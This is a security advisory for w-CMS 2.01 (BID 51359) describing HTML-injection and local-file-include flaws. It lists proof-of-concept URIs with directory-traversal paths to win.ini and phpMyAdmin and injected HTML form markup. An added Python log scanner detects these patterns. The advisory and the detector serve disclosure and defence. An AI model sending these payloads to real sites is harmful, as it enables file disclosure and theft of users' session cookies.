w-CMS HTML Injection and Local File Include Vulnerabilities
BID:51359
Info
| Bugtraq ID: | 51359 |
| Class: | Input Validation Error |
| CVE: | CVE-2012-6522 CVE-2012-6523 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2012 12:00AM |
| Updated: | Mar 19 2015 07:34AM |
| Credit: | th3.g4m3_0v3r |
| Vulnerable: | w-CMS w-CMS 2.01 |
| Not Vulnerable: | |
Discussion
w-CMS is prone to multiple HTML-injection vulnerabilities and a local file-include vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. Other attacks are also possible.
w-CMS 2.0.1 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues through a browser.
The following example URIs are available:
Local file include:
http://www.example.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://www.example.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
HTML injection:
http://www.example.com/index.php?bid=1&COMMENT=1[HTML]
http://www.example.com/?p=3[HTML]
http://www.example.com/?bid=5&p=1[HTML]
http://www.example.com/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>
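With no vendor patch listed, web server logs are one place to look for requests shaped like the example URIs above. The following is an added example, not part of the original advisory or of w-CMS: it flags traversal sequences and HTML markup in the `p`, `bid` and `COMMENT` parameters. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameters named in the advisory's example URIs (case-insensitive).
WATCHED = {"p", "bid", "comment"}
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # a ".." path segment
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)        # start of an HTML tag
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2012:09:00:01 +0000] "GET /wcms-2.01_2/?p=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Jan/2012:09:00:07 +0000] "GET /wcms-2.01_2/?p=../../../windows/win.ini HTTP/1.1" 200 478',
    '192.0.2.44 - - [10/Jan/2012:09:00:09 +0000] "GET /wcms-2.01_2/?p=%252e%252e%252fconfig HTTP/1.1" 200 91',
    '192.0.2.71 - - [10/Jan/2012:09:02:30 +0000] "GET /?bid=5&p=1%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 5301',
    '192.0.2.71 - - [10/Jan/2012:09:02:41 +0000] "GET /index.php?bid=1&COMMENT=1%3Cform%20action%3D%22x%22%3E HTTP/1.1" 200 5310',
]

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(target):
    """Return sorted (parameter, finding) pairs for one request target."""
    findings = set()
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in WATCHED:
            continue
        value = decode(raw)  # parse_qsl has already removed one encoding layer
        if TRAVERSAL.search(value):
            findings.add((name, "path-traversal"))
        if MARKUP.search(value):
            findings.add((name, "html-markup"))
    return sorted(findings)

def scan(lines):
    """Return {line_number: findings} for log lines with suspicious values."""
    report = {}
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = classify(match.group(1)) if match else []
        if hits:
            report[number] = hits
    return report
```

Calling `scan(SAMPLE_LOG)` flags lines 2 through 5 and leaves the benign request on line 1 alone.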
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].